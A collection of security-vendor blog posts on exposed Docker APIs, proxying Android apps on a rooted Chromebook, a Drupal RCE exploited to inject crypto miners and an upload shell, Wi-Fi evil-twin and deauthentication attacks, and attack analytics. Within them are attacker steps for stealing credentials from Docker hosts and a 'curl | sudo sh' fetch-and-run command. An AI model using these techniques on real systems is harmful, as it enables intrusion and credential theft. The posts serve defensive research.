Publicly Accessible Docker Hosts

The Docker remote API listens on ports 2735 / 2736. By default, the remote API is only accessible from the loopback interface (“localhost”, “”), and should not be available from external sources. However, as with other cases —  for example, publically-accessible Redis servers such as RedisWannaMine —  sometimes organizations are misconfiguring their services, allowing easy access to their sensitive data.

We used the Shodan search engine to find open ports running Docker.

We found 3,822 Docker hosts with the remote API exposed publicly.

We wanted to see how many of these IPs are really exposed. In our research, we tried to connect to the IPs on port 2735 and list the Docker images. Out of 3,822 IPs, we found approximately 400 IPs are accessible.

Red indicates Docker images of crypto miners, while green shows production environments and legitimate services  

We found that most of the exposed Docker remote API IPs are running a cryptocurrency miner for a currency called Monero. Monero transactions are obfuscated, meaning it is nearly impossible to track the source, amount, or destination of a transaction.  

Other hosts were running what seemed to be production environments of MySQL database servers, Apache Tomcat, and others.

Hacking with the Docker Remote API

The possibilities for attackers after spawning a container on hacked Docker hosts are endless. Mining cryptocurrency is just one example. They can also be used to:

  • Launch more attacks with masked IPs
  • Create a botnet
  • Host services for phishing campaigns
  • Steal credentials and data
  • Pivot attacks to the internal network

Here are some script examples for the above attacks.

1. Access files on the Docker host and mounted volumes

By starting a new container and mounting it to a folder in the host, we got access to other files in the Docker host:

It is also possible to access data outside of the host by looking on container mounts. Using the Docker inspect command, you can find mounts to external storage such as NFS, S3 and more. If the mount has write access, you can also change the data.

2. Scan the internal network

When a container is created in one of the predefined Docker network “bridge” or “host,” attackers can use it to access hosts the Docker host can access within the internal network. We used nmap to scan the host network to find services. We did not need to install it, we simply used a ready image from the Docker Hub:

It is possible to find other open Docker ports and navigate inside the internal network by looking for more Docker hosts as described in our Redis WannaMine post.

3. Credentials leakage

It is very common to pass arguments to a container as environment variables, including credentials such as passwords. You can find examples of passwords sent as environment variables in the documentation of many Docker repositories.

We found 3 simple ways to detect credentials using the Docker remote API:

Docker inspect command

“env” command on a container

Docker inspect doesn’t return all environment variables. For example, it doesn’t return ones which were passed to docker run using the –env-file argument. Running “env” command on a container will return the entire list:

Credentials files on the host

Another option is mounting known credentials directories inside the host. For example, AWS credentials have a default location for CLI and other libraries and you can simply start a container with a mount to the known directory and access a credentials file like “~/.aws/credentials”.

4. Data Leakage

Here is an example of how a database and credentials can be detected, in order to run queries on a MySQL container:

Wrapping Up

In this post, we saw how dangerous exposing the Docker API publicly can be.

Exposing Docker ports can be useful, and may be required by third-party apps like ‘portainer’, a management UI for Docker.

However, you have to make sure to create security controls that allow only trusted sources to interact with the Docker API. See the Docker documentation on Securing Docker remote daemon.

Imperva is going to release a cloud discovery tool to better help IT, network and security administrators answer two important questions:

  • What do I have?
  • Is it secure?

The tool will be able to discover and detect publicly-accessible ports inside the AWS account(s). It will also scan both instances and containers. To try it, please contact Imperva sales.

We also saw how credentials stored as environment variables can be retrieved. It is very common and convenient, but far from being secure. Instead of using environment variables, it is possible to read the credentials on runtime (depends on your environment). In AWS you can use roles and KMS. In other environments, you can use 3rd party tools like Vault or credstash.

The post Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners appeared first on Blog.

Android App Testing on Chromebooks

Part of testing Android mobile applications is proxying traffic, just like other web applications.  However, since Android Nougat (back in 2016), user or admin-added CAs are no longer trusted for secure connections.  Unless the application was written to trust these CAs, we have no way of viewing the https traffic being passed between the client and servers.  Your only two options are to either buy a device running an older version of Android OS or to root your existing device.  Rooting a device can cause all sorts of issues and depending on your system may require a bit of effort and installation of other tools and utilities.  This is probably overkill just for adding a certificate.  Luckily, there is another option: Chromebooks. 

Google has been promoting the ability to install apps from the Google Play store since the middle of 2016.  Now, to proxy the traffic from an Android application, you will most likely still need to root the Android subsystem.  This is not always the case but, even if you do, rooting (and un-rooting) a Chromebook is remarkably easy.  Not to mention, you get a real keyboard and large screen!  However, before you run out and buy a Chromebook to use for testing, you should be aware of a few caveats:

  • Not all Chromebooks can run Android apps
  • Not all Android apps install on a Chromebook
  • Rooting the Android subsystem will wipe all existing user data on the Chromebook
  • Using the Developer Mode will stop the chromebook from installing most updates and prevent some applications from installing

Let’s walk through the process of getting the Burp CA cert added as a System CA on a Chromebook’s Android subsystem.  The whole process takes about an hour (depending on the speed of your Chromebook).  Before we start making any changes, be sure to copy any data you want to keep off of the Chromebook.  This process will wipe the device.

Enable Developer Mode
The method to get into development mode may be slightly different than what I list, depending on the Chromebook you are using.  I’m using an Asus R11. Please refer to Step 3 from the “Recover Your Chromebook” web page: for methods for other devices.

  1. Press ESC, Refresh, and the power button at the same time to load Recovery Mode.
  2. When the Recovery Mode screen loads, press Ctrl+D and then Enter
  3. The system will reboot and you will see the OS Verification warning screen.  Press Ctrl+D again.  From this point forward, until you revert back to a verified OS, you will have to press Ctrl+D at every boot up.
  4. Wait for about 15 minutes while the Chromebook prepares the Developer mode

Enable Debugging Features
This does not need to be done, but I highly recommend it so you can get a full bash terminal session through crosh (the Chrome OS shell).  This must be done on the first boot up after the Chromebook finishes installing Developer mode.

The Chromebook will reboot and then prompt you for a root password

Set sudo Password for the Dev Console in crosh
At this point, sign in to the Chromebook as normal.  Let the system create your profile and load the Google Play store.  Depending on your Google and Chrome settings, you may need to wait a bit as applications are automatically installed.

  1. Press Ctrl+Alt+F2 (or the Forward -> button) to get to the Developer Console.
  2. Login with root and the password you previously set up
  3. Type chromeos-setdevpasswd and press Enter.  You will be prompted for the sudo password.
  4. Type logout and press Enter
  5. Press Ctrl+Alt+F1 (or the Back <- button) to go back to the main screen

Disable OS Checks and Hardening
Before we can actually root the Chromebook, we need to disable some security settings.

  1. Press Ctrl+Alt+t to open the crosh window
  2. Type shell and press Enter to load a full shell
  3. Type sudo crossystem dev_boot_signed_only=0 and press Enter
  4. Type sudo /usr/libexec/debugd/helpers/dev_features_rootfs_verification and press Enter
  5. Reboot the Chromebook
    1. sudo reboot
  6. Once the system comes back, open another terminal window (Ctrl+Alt+t >> shell)
  7. Run the following command:  sudo /usr/share/vboot/bin/ –remove_rootfs_verification –partitions $(( $(rootdev -s | sed -r ‘s/.*(.)$/\1/’) – 1))
  8. Reboot the Chromebook (sudo reboot)

“Root” the Android Subsystem
Up until this point, we’ve just been prepping the system.  Running the following command will copy my modified script from GitHub and create an editable partition we can add items to (such as new CA certs).

curl -Ls | sudo sh

This script was modified from work that nolirium created (  My version does not add in the extra tools (BusyBox, etc) included in the original.

Once the script finishes (as shown above), reboot once again.  Once the Chromebook comes back online, we can install the Burp cert.

Configuring Android subsystem to use the Burp Certificate
We’re almost done but this portion takes multiple steps.  This is mainly because the Android subsystem wants the cert to be in a different format and named a specific way.

  1. Download the certificate from Burp and copy to the Chromebook.  If you copy the cert to the Downloads directory on the Chromebook, the path (in a shell window) is /home/user/<randomstring>/Downloads.  All of my following examples assume you downloaded the certificate to the Downloads directory
  2. Convert the cert to one used by Android (this can be done on linux system or on the Chromebook itself in a terminal window):
                openssl x509 -inform der -in cacert.der -out burp.pem
  3. Import the burp.pem file as an Authority in Chrome.  This is done in the GUI.
    1. Open Settings
    2. Expand “Advanced”
    3. Click on Manage Certificates
    4. Select the Authorities tab
    5. Click on Import.
    6. Find the burp.pem file and import it.
      1. Select all 3 check boxes for the Trust settings and click on OK
    7. Validate that the org-PortSwigger CA is now listed (as shown below)
  4. The CA should now also be listed as an Android User certificate
    1. Open Settings
    2. Click on the Google Play Store settings -> Manage Android preferences
    3. Click on Security
    4. Click on Trusted credentials
    5. Click on the User tab
    6. Validate the certificate is there as well. 
    7. If the cert is not listed, you can import the certificate by following the next few steps:
      • Go back to the Security menu
      • Select Install from SD card
      • Select Downloads in the Open from window
      • Select the burp.pem file and give it a name
      • The cert should now be listed as a Trusted User Credential
  5. Find the name of the certificate that was added to Android
    1. Open a shell (Ctrl+Alt+t and then shell) and run:
        sudo ls /opt/google/containers/android/rootfs/android-data/data/misc/user/0/cacerts-added
    2. Take note of the of the file name.  In my case, it is 9a5ba575.0.  We will be using this name for our new System CA certificate file we are about to create.
  6. Create the properly formatted certificate file. (This can be done on a linux server or on the Chromebook itself.  Where ever you created the burp.pem file):
     cat burp.pem > 9a5ba575.0
  7. Append the cert text to the file:
      openssl x509 -inform PEM -text -in burp.pem -out /dev/null >> 9a5ba580.0
  8. Copy our new cert file to the Android system:
      cp /home/user/<randomstring>/Downloads/9a5ba575.0 /opt/google/containers/android/rootfs/root/system/etc/security/cacerts/
  9. Reboot
  10. Validate that the PortSwigger CA is now listed in the Trusted Systems
    1. Open Settings
    2. Click on the Google Play Store settings -> Manage Android preferences
    3. Click on Security
    4. Click on Trusted credentials

You should now be able to proxy your traffic through Burp and intercept https traffic!  Often, when I do this, I send the data to my other laptop.  This is so I can save all of the proxy information (including required exclusions for android / google) to a dedicated wifi connection.  This is the current list of exclusions, but it is always growing:

  • alt*.gstatic.com2

Returning to Normal
Reverting back to the normal state is very easy.  First off, copy off the custom cert files (as they will be named the same thing if you choose to do this process again later).  Then perform the following steps:

  1. Run this command to put back the default Android Image:
      sudo mv /opt/google/containers/android/system.raw.img.bk /opt/google/containers/android/system.raw.img
  2. Reboot the Chromebook
  3. When the system boots to the OS Verification screen, instead of pressing Ctrl+D, press the spacebar.  This will wipe the Chromebook and put it back to the default configuration.

If you run into extreme issues, you should be able to powerwash the device.  At worse, you will have to reinstall the OS, which takes about an hour but is much easier on the Chromebook than other Android systems.  The full process to recover a Chromebook can be found here:

Don’t Let Security Needs Halt Your Digital Transformation. Imperva FlexProtect Offers Agile Security for any Enterprise.

Is your enterprise in the midst of a digital transformation? Of course it is. Doing business in today’s global marketplace is more competitive than ever. Automating your business processes and infusing them with always-on, real-time applications and other cutting-edge technology is key to keeping your customers happy, attracting and retaining good workers, transacting with your partners, and growing your business.

A transformation this sweeping doesn’t happen overnight, though. Mission-critical applications and processes can’t be swapped for new ones without risk to your bottom line. While all enterprises are moving to hosted applications or virtualized software hosted on Infrastructure as a Service (IaaS) platforms such as AWS or Microsoft Azure, the reality is that it will take many years for them to become all cloud — if ever.

In other words, many,  if not most enterprises have a hybrid IT infrastructure. And that’s not going to change for many years.

In the meantime, you need security strong enough to protect your business and agile enough to cover your transforming infrastructure. That’s why Imperva has introduced a simpler way for organizations to deploy our family of security products and services, which we call FlexProtect. FlexProtect comes in three different plans: FlexProtect Pro, FlexProtect Plus, and FlexProtect Premier.

With the FlexProtect Plus and Premier plans, our analyst-recognized application and data security solutions protect your applications and data even as you migrate them from on-premises data centers to multiple cloud providers. Don’t let complicated, inflexible security licenses slow down your cloud migration. FlexProtect provides simple and predictable licensing that covers your entire IT infrastructure, even if you use multiple clouds for IaaS, and even as you move workloads between on-premises and clouds. With our powerful security analytics solutions available in all FlexProtect plans, you also have the visibility and control you need to help you manage your security wherever your assets are.

Imperva also offers a third option, FlexProtect Pro. This brings together five powerful SaaS-based Application Security capabilities to protect your edge from attack: Cloud WAF, Bot Protection, IP Reputation Intelligence, our Content Delivery Network (CDN) as well as our powerful Attack Analytics solution, which turns events into insights you can act on. FlexProtect Pro gives businesses simple application security delivered completely as a service.

Imperva is in the midst of its own transformation — learn more about the New Imperva here. That gives us keen insight into the challenges with which our customers are grappling. And that’s why we developed FlexProtect licensing, in order to better defend your business and its growth, wherever you are on your digital transformation journey. You’ll never have to choose between innovating for your customers and protecting what matters.

To learn more about FlexProtect, meet us at the RSA Conference March 4-8 in San Francisco. Stop by Booth 527 in the South Expo and hear directly from Imperva experts. You can also see a demo of our latest products in the areas of cloud app and data security and data risk analytics.

Imperva will also be at the AWS booth (1227 in the South Expo hall), where you’ll be able to hear how one of our cloud customers, an U.S.-based non-profit with nearly 40 million members, uses Imperva Autonomous Application Protection (AAP) to detect and mitigate potential application attacks, Tuesday, March 5th from 3:30 – 4:00 pm in the AWS booth. You can also see a demo of how our solutions work in cloud environments, Tuesday, March 5th 3:30-5 pm and Wednesday, March 6th, 11:30-2 pm.

Finally — I will be participating in the webinar “Cyber Security Battles: How to Prepare and Win” during RSA. It will be broadcast live at 9:30 am on March 6th and feature a Q&A discussion with several cybersecurity executives as they discuss the possibility of a cyber battle between AI systems, which some experts predict might be on the horizon in the next three to five years. Register and watch the live feed or recording for free!

The post Don’t Let Security Needs Halt Your Digital Transformation. Imperva FlexProtect Offers Agile Security for any Enterprise. appeared first on Blog.

Latest Drupal RCE Flaw Used by Cryptocurrency Miners and Other Attackers

cryptocurrency miner via website vulnerability

Another remote code execution vulnerability has been revealed in Drupal, the popular open-source Web content management system. One exploit — still working at time of this writing — has been used in dozens of unsuccessful attacks against our customers, with an unknown number of attacks, some likely successful, against other websites.

Published on February 20th, the new vulnerability (known as CVE 2019-6340 and SA-CORE-2019-003) is about fields types that don’t sanitize data from non-form sources when the Drupal 8 core REST module and another web services module such as JSON:API are both enabled. This allows arbitrary PHP remote code execution that could lead to compromise of the web server.

An exploit was published a day after the vulnerability was published, and continues to work even after following the Drupal team’s proposed remediation of disabling all web services modules and banning PUT/PATCH/POST requests to web services resources. Despite the fix, it is still possible to issue a GET request and therefore perform remote code execution as was the case with the other HTTP methods. Fortunately, users of Imperva’s Web Application Firewall (WAF) were protected.

Attack Data

Imperva research teams constantly analyze attack traffic from the wild that passes between clients and websites protected by our services. We’ve found dozens of attack attempts aimed at dozens of websites that belong to our customers using this exploit, including sites in government and the financial services industry.

The attacks originated from several attackers and countries, and all were blocked thanks to generic Imperva policies that had been in place long before the vulnerability was published.

Figure 1 below shows the daily number of CVE 2019-6340 exploits we’ve seen in the last couple of days.

Figure 1: Attacks by date

As always, attacks followed soon after the exploit was published. So being up to date with security updates is a must.

According to Imperva research, 2018 saw a year-over-year increase in Drupal vulnerabilities, with names such as DirtyCOW and Drupalgeddon 1, 2 and 3. These were used in mass attacks that targeted hundreds of thousands of websites.

There were a few interesting payloads in the most recent attacks. One payload tries to inject a Javascript cryptocurrency (Monero and Webchain) miner named CoinIMP into an attacked site’s index.php file so that site visitors will run the mining script when they browse the site’s main page, for the attacker’s financial benefit.

The following is CoinIMP’s client side embedded script ( The script uses a 64 character length key generated by the CoinIMP panel to designate the site key of the attacker on CoinIMP.

The attacker’s payload also tries to install a shell uploader to upload arbitrary files on demand.

Here is the upload shell ( content:

Imperva Customers Protected

Customers of Imperva Web Application Firewall (WAF, formerly Incapsula) were protected from this attack due to our RCE detection rules. So although the attack vector is new, its payload is old and has been dealt with in the past.

We also added new dedicated and generic rules to our WAF (both the services formerly known as Incapsula and SecureSphere) to strengthen our security and provide wider coverage to attacks of this sort.

The post Latest Drupal RCE Flaw Used by Cryptocurrency Miners and Other Attackers appeared first on Blog.

Imperva Makes Major Expansion in Application Security

When Imperva announced in 2018 it would acquire the application security solution provider Prevoty, a company I co-founded with Julien Bellanger, I knew it would be a win-win for our industry. Prevoty’s flagship product, Autonomous Application Protection, is the most mature, market-tested runtime application self-protection (RASP) solution (as proof, Prevoty was just named a Silver Winner in the Cybersecurity Excellence Awards). Together, Imperva and Prevoty are creating a consolidated, comprehensive platform for application and data security.

More importantly, this acquisition is a big win for our customers. The combination of Imperva and Autonomous Application Protection extends customers’ visibility into how applications behave and how users interact with sensitive information. With this expanded view across their business assets, customers will have deeper insights to understand and mitigate security risk at the edge, application, and database.

In parallel with product integrations, our teams of security innovators are coming together. I am delighted to join the Imperva team as CTO and to lead a highly accomplished group to radically transform the way our industry thinks about application and data security. In the coming horizon, we will boost data visibility throughout the stack, translate billions of data points into actionable insights, and intelligently automate responses that protect businesses. In fact, we just released two new features that deliver on those goals: Network Activity Protection and Weak Cryptography Protection. Learn more about these at and also in my interview with eWeek.

Network Activity Protection provides organizations with the ability to monitor and prevent unauthorized outbound network communications originating from within their applications, APIs, and microservices — a blind spot for organizations that are undergoing a digital transformation. Organizations now have a clear view into the various endpoints with which their applications communicate.

The new Weak Cryptography Protection feature offers the ability to monitor and protect against the use of specific weak hashing algorithms (including SHA-1, MD5) and cryptographic ciphers (including AES, 3DES/DES, RC4). Applications that leverage Autonomous Application Protection can now monitor and force compliant cryptographic practices.  

Imperva is leading the world’s fight to keep data and applications safe from cyber criminals. Organizations that deploy Imperva will not have to choose between innovation and protecting their customers. The future of application and data security will be smarter,simpler, and we are leading the way there.

Imperva will be at the RSA Conference March 4-8 in San Francisco. Stop by Booth 527 in the South Expo and learn about the New Imperva from me (I’ll be there Tuesday-Thursday) and other executives! We’ve revamped our suite of security solutions under a new license called FlexProtect that makes it simpler for organizations to deploy our security products and services to deliver the agility they need as they digitally transform their businesses.

Start your day or enjoy an afternoon pick-me-up by grabbing a coffee in our booth Tuesday through Thursday 10-2 pm, while:

  • See a demo of our latest products in the areas of cloud app and data security and data risk analytics
  • Learn more about how our suite of security solutions works in AWS environments

Imperva will also be at the AWS booth (1227 in the South Expo hall). There, you can:

  • Hear how one of our cloud customers, an U.S.-based non-profit with nearly 40 million members, uses AAP to detect and mitigate potential application attacks, Tuesday, March 5th from 3:30 – 4:00 pm in the AWS booth
  • See a demo of how our solutions work in cloud environments, Tuesday, March 5th 3:30-5 pm and Wednesday, March 6th, 11:30-2 pm

Finally – we will be participating in the webinar “Cyber Security Battles: How to Prepare and Win” at RSA. It will be first broadcast at 9:30 am on March 6th and feature George McGregor, vice-president of product marketing at Imperva, in a Q&A discussion with executives from several other vendors as they discuss the possibility of a cyber battle between AI systems, which experts predict might be on the horizon in the next three to five years. Register and watch for free!

The post Imperva Makes Major Expansion in Application Security appeared first on Blog.

No One is Safe: the Five Most Popular Social Engineering Attacks Against Your Company’s Wi-Fi Network

Your Wi-Fi routers and access points all have strong WPA2 passwords, unique SSIDs, the latest firmware updates, and even MAC address filtering. Good job, networking and cybersecurity teams! However, is your network truly protected? TL;DR: NO!

In this post, I’ll cover the most common social engineering Wi-Fi association techniques that target your employees and other network users. Some of them are very easy to launch, and if your users aren’t aware of and know how to avoid them, it’s only a matter of time until your network is breached.

Attackers only need a Unix computer (which can be as inexpensive and low-powered as a $30 Raspberry Pi), a Wi-Fi adapter with monitor mode enabled, and a 3G modem for remote control. They can also buy ready-made stations with all of the necessary tools and user interface, but where’s the fun in that? 

Figure 1: Wi-Fi hacking tools

1) Evil Twin AP

An effortless and easy technique. All attackers need to do is set up an open AP (Access Point) with the same or similar SSID (name) as the target and wait for someone to connect. Place it far away from the target AP where the signal is low and it’s only a matter of time until some employee connects, especially in big organizations. Alternatively, impatient attackers may follow the next technique.

Figure 2: Evil Twin Demonstration

2. Deauthentication / Disassociation Attack

In the current IEEE 802.11 (Wi-Fi protocol) standards, whenever a wireless station wants to leave the network, it sends a deauthentication or disassociation frame to the AP. These two frames are sent unencrypted and are not authenticated by the AP, which means anyone can spoof those packets.

This technique makes it very easy to sniff the WPA 4-way handshake needed for a Brute Force attack, since a single deauthentication packet is enough to force a client to reconnect.

Even more importantly, attackers can spoof these messages repeatedly and thus disable the communication between Wi-Fi clients and the target AP, which increases the chance your users will connect to the attacker’s twin AP. Combining these 2 techniques works very well, but still depends on the user connecting to the fake AP. The following technique does not, however.

3. Karma Attack

Whenever a user device’s Wi-Fi is turned on but not connected to a network, it openly broadcasts the SSIDs of previously-associated networks in an attempt to connect to one of them. These small packets, called probe requests, are publicly viewable by anyone in the area.

The information gathered from probe requests can be combined with geo-tagged wireless network databases such as to map the physical location of these networks.

If one of the probe requests contains an open Wi-Fi network SSID, then generating the same AP for which the user device is sending probes will cause the user’s laptop, phone or other device to connect to an attacker’s fake AP automatically.

Forcing any connected device to send probe requests is very easy, thanks to the previous technique.

Figure 3: Sniffing Probe Requests

4. Known Beacons

The final attack I’ll discuss that can lead your user to connect to an attacker’s fake AP is “Known Beacons.” This is a random technique where attacker broadcast dozens of beacon frames of common SSIDs that nearby wireless users have likely connected to in the past (like AndroidAP, Linksys, iPhone, etc.). Again, your users will automatically authenticate and connect due to the “Auto-Connect” feature.

An attacker has connected with your user, now what?

Once attackers have access to your user, there’s a variety of stuff they can do: sniff the victim’s traffic, steal login credentials, packet injection, port scan, exploit the user device, etc. But most importantly, the attacker can also get the target AP password by a victim-customized web phishing attack.

Since the victim is using the black hat hacker’s machine as a router, there are many ways to manipulate the phishing page to look convincing. One of them is a captive portal. For example, by DNS hijacking, he can forward all web requests to his local web server, so that his page appears no matter where the victim tries to access it from. Even worse, most operating systems will identify his page as a legitimate captive portal and open it automatically!

Figure 4: Captive Portal Attack

5. Bypassing MAC Address Filtering

As mentioned, your networks may use MAC Filtering, which means only predefined devices can connect to your network and having the password is not enough. How much does that help?

All MAC addresses are hard-coded into a network card and can never be changed. However, attackers can change the MAC address in their operating system and pretend to be one of the allowed devices.

Attackers can easily get the MAC address of one of your network’s allowed devices, since every packet sent to and from your employee’s device includes its MAC address unencrypted. Of course, attackers have to force your employee’s device to disconnect (using deauthentication packets) before connecting to your network using the hacked MAC address.

How Can You Mitigate?

Detecting an Evil AP in your area can be done easily by scanning and comparing configurations of nearby access points. However, as with any social engineering attack, the best way to mitigate is by training your users, which is a critical element of security.

Make sure your network users understand the risk of connecting to open access points and are well aware of the techniques mentioned. Running simulations of the above attacks is also recommended.

Finally, while specific techniques will come and go, social engineering will always remain a popular strategy for attackers. So make sure you and your users remain aware!

The post No One is Safe: the Five Most Popular Social Engineering Attacks Against Your Company’s Wi-Fi Network appeared first on Blog.

How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications

Attacks on applications can be divided into two types: targeted attacks and “spray and pray” attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization’s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or sold on the dark web. Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack.

One famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability (CVE-2018-7600) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. Tools exploiting this weakness became widely available, which caused the number of attacks on Drupal sites to explode.

The ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, and/or identify a sniffing attack that could be a precursor to a more serious targeted one.

Identifying Spray and Pray Attacks in Attack Analytics

Attack Analytics, launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigate-able incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.

We recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below.

Figure 1: Attack Analytics Dashboard

Clicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). An alternative way to get the list of spray and pray incidents potentially affecting the user is to login to the console and use the “How common” filter.

Figure 2: Attack Analytics Many Customers Filter


A closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).

Figure 3: Attack Analytics Incident Insights

How Our Algorithm Works

The algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When there are similar incidents across a large number of customers in a close amount of time, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge, and is based on a combination of factors, such as:

  • The attack source: Network source (IP/Subnet), Geographic location
  • The attack target: URL, Host, Parameters
  • The attack time: Duration, Frequency
  • The attack type: Triggered rule
  • The attack tool: Tool name, type & parameters

In some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. When it is a distributed attack, the origin of the attack is not relevant, while other factors are relevant. In many cases, a spray and pray attack will be aimed at the same group of URLs.

Another significant common factor is the attack type, in particular, a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes, the same tools are observed, or the tools belong to the same type of attacks. The time element is also key, especially the duration of the attack or the frequency.

Results and Findings

The Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties the incidents together. When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) is attacked.

Figure 4: Spray & Pray Incidents Spread

Here’s an interesting example – a spray and pray attack from a single IP that attacked 1,368 customers in the same 3 consecutive days with the same vulnerability scanner, LTX71. We’ve also seen Bad Bots illegally accessing resources, attacking from the same subnet located in Illinois using a Trustwave vulnerability scanner. These bots performed a URLs scan on our customers resources – an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files  on more than 50 different customers with a cURL. And the list goes on.

Focusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers.

Figure 5: Single Source Spray & Pray Accounts Affected

More Actionable Insights Coming

Identifying spray and pray attacks is a great example of using the intelligence from Imperva’s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future.

The post How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications appeared first on Blog.